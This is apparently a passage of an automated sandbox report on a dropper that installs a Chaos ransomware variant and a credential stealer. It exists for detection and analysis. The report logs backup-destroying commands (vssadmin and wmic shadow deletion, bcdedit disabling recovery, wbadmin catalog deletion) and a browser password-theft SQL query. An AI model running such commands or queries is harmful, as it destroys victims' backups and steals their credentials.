                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA4642F804_2_00007FFBA4642F80
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA45CBF404_2_00007FFBA45CBF40
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA46110004_2_00007FFBA4611000
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA46250404_2_00007FFBA4625040
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA46218C04_2_00007FFBA46218C0
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA45FF8D04_2_00007FFBA45FF8D0
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA45AE9804_2_00007FFBA45AE980
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA45E59604_2_00007FFBA45E5960
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA45A69484_2_00007FFBA45A6948
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA465FA504_2_00007FFBA465FA50
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA45C0A404_2_00007FFBA45C0A40
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA4650A404_2_00007FFBA4650A40
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA4619AE04_2_00007FFBA4619AE0
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA4601AC04_2_00007FFBA4601AC0
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA45AAAB04_2_00007FFBA45AAAB0
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA4634B804_2_00007FFBA4634B80
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA4653B704_2_00007FFBA4653B70
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA45BBB604_2_00007FFBA45BBB60
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA45C7C904_2_00007FFBA45C7C90
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA4626C504_2_00007FFBA4626C50
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA47182684_2_00007FFBA4718268
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA47318A04_2_00007FFBA47318A0
                  Source: C:\Windows\System32\wbengine.exeProcess token adjusted: Security
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeCode function: String function: 0005FD4C appears 42 times
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeCode function: String function: 000605F0 appears 31 times
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeCode function: String function: 0005FE20 appears 56 times
                  Source: C:\Users\user\Desktop\Mai.exeCode function: String function: 00007FFBA45A8C40 appears 31 times
                  Source: C:\Users\user\Desktop\Mai.exeCode function: String function: 00007FFBA45CFF00 appears 38 times
                  Source: C:\Users\user\Desktop\Mai.exeCode function: String function: 00007FFBA45A8E10 appears 129 times
                  Source: C:\Users\user\Desktop\Mai.exeCode function: String function: 00007FFBA45A9D60 appears 171 times
                  Source: C:\Users\user\Desktop\Mai.exeCode function: String function: 00007FF6DD652B30 appears 47 times
                  Source: _overlapped.pyd.2.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                  Source: unicodedata.pyd.2.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                  Source: api-ms-win-crt-conio-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-file-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-crt-runtime-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-rtlsupport-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-crt-environment-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-sysinfo-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-memory-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-crt-stdio-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-util-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-errorhandling-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-interlocked-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-processenvironment-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-synch-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-file-l2-1-0.dll.2.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-timezone-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-handle-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-synch-l1-2-0.dll.2.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-debug-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-localization-l1-2-0.dll.2.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-datetime-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-processthreads-l1-1-1.dll.2.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-crt-utility-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-crt-time-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-crt-filesystem-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-crt-convert-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-crt-math-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-crt-string-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-crt-heap-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-file-l1-2-0.dll.2.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-crt-process-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-libraryloader-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                  Source: python3.dll.2.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-processthreads-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-heap-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-console-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-string-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-profile-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-core-namedpipe-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                  Source: api-ms-win-crt-locale-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                  Source: 4wx72yFLka.exe, 00000000.00000003.1451758273.0000000006A50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemain.exe4 vs 4wx72yFLka.exe
                  Source: 4wx72yFLka.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 3.2.main.exe.126e8a00.1.raw.unpack, type: UNPACKEDPEMatched rule: Destructive_Ransomware_Gen1 date = 2018-02-12, hash1 = ae9a4e244a9b3c77d489dee8aeaf35a7c3ba31b210e76d81ef2e91790f052c85, author = Florian Roth, description = Detects destructive malware, reference = http://blog.talosintelligence.com/2018/02/olympic-destroyer.html, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 3.2.main.exe.126e8a00.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICOUS_EXE_References_VEEAM description = Detects executables containing many references to VEEAM. Observed in ransomware
                  Source: 3.2.main.exe.126e8a00.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chaos author = ditekSHen, description = Detects Chaos ransomware
                  Source: 3.2.main.exe.126e8a00.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICOUS_EXE_References_VEEAM description = Detects executables containing many references to VEEAM. Observed in ransomware
                  Source: 3.2.main.exe.126e8a00.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chaos author = ditekSHen, description = Detects Chaos ransomware
                  Source: 3.0.main.exe.130000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICOUS_EXE_References_VEEAM description = Detects executables containing many references to VEEAM. Observed in ransomware
                  Source: 3.0.main.exe.130000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chaos author = ditekSHen, description = Detects Chaos ransomware
                  Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICOUS_EXE_References_VEEAM description = Detects executables containing many references to VEEAM. Observed in ransomware
                  Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPEDMatched rule: MALWARE_Win_Chaos author = ditekSHen, description = Detects Chaos ransomware
                  Source: svchost.exe.3.dr, Program.csBase64 encoded string: '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
                  Source: 4wx72yFLka.exe, 00000000.00000003.1451758273.0000000006A50000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000003.00000002.1536320956.00000000126FB000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000003.00000000.1465048212.0000000000132000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: .vb.m1v.sln.pst.obj
                  Source: classification engineClassification label: mal100.rans.phis.troj.spyw.evad.winEXE@62/1169@1/2
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeCode function: 0_2_00047707 GetLastError,FormatMessageW,0_2_00047707
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeCode function: 0_2_0005B6A2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_0005B6A2
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeFile created: C:\Users\user\Desktop\__tmp_rar_sfx_access_check_6747609Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7876:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3832:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7944:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4028:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7528:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4032:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3120:120:WilError_03
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562Jump to behavior
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeCommand line argument: sfxname0_2_0005EEDC
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeCommand line argument: sfxstime0_2_0005EEDC
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeCommand line argument: STARTDLG0_2_0005EEDC
                  Source: 4wx72yFLka.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeFile read: C:\Windows\win.iniJump to behavior
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SELECT action_url, username_value, password_value FROM logins;
                  Source: Mai.exe, 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                  Source: Mai.exe, 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                  Source: Mai.exe, 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                  Source: Mai.exe, 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                  Source: Mai.exe, Mai.exe, 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                  Source: Mai.exe, 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                  Source: Mai.exe, 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                  Source: 4wx72yFLka.exeReversingLabs: Detection: 63%
                  Source: 4wx72yFLka.exeVirustotal: Detection: 50%
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeFile read: C:\Users\user\Desktop\4wx72yFLka.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\4wx72yFLka.exe "C:\Users\user\Desktop\4wx72yFLka.exe"
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeProcess created: C:\Users\user\Desktop\Mai.exe "C:\Users\user\Desktop\Mai.exe"
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeProcess created: C:\Users\user\Desktop\main.exe "C:\Users\user\Desktop\main.exe"
                  Source: C:\Users\user\Desktop\Mai.exeProcess created: C:\Users\user\Desktop\Mai.exe "C:\Users\user\Desktop\Mai.exe"
                  Source: C:\Users\user\Desktop\main.exeProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
                  Source: C:\Users\user\Desktop\Mai.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k swprv
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy delete
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbadmin.exe wbadmin delete catalog -quiet
                  Source: unknownProcess created: C:\Windows\System32\wbengine.exe "C:\Windows\system32\wbengine.exe"
                  Source: unknownProcess created: C:\Windows\System32\vdsldr.exe C:\Windows\System32\vdsldr.exe -Embedding
                  Source: unknownProcess created: C:\Windows\System32\vds.exe C:\Windows\System32\vds.exe
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy delete
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbadmin.exe wbadmin delete catalog -quiet
                  Source: unknownProcess created: C:\Windows\System32\notepad.exe "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\read_it.txt
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\notepad.exe "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\read_it.txt
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\notepad.exe "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\read_it.txt
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeProcess created: C:\Users\user\Desktop\Mai.exe "C:\Users\user\Desktop\Mai.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeProcess created: C:\Users\user\Desktop\main.exe "C:\Users\user\Desktop\main.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeProcess created: C:\Users\user\Desktop\Mai.exe "C:\Users\user\Desktop\Mai.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\main.exeProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy deleteJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled noJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quietJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\notepad.exe "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\read_it.txtJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy delete
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbadmin.exe wbadmin delete catalog -quiet
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\notepad.exe "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\read_it.txt
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy delete
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbadmin.exe wbadmin delete catalog -quiet
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
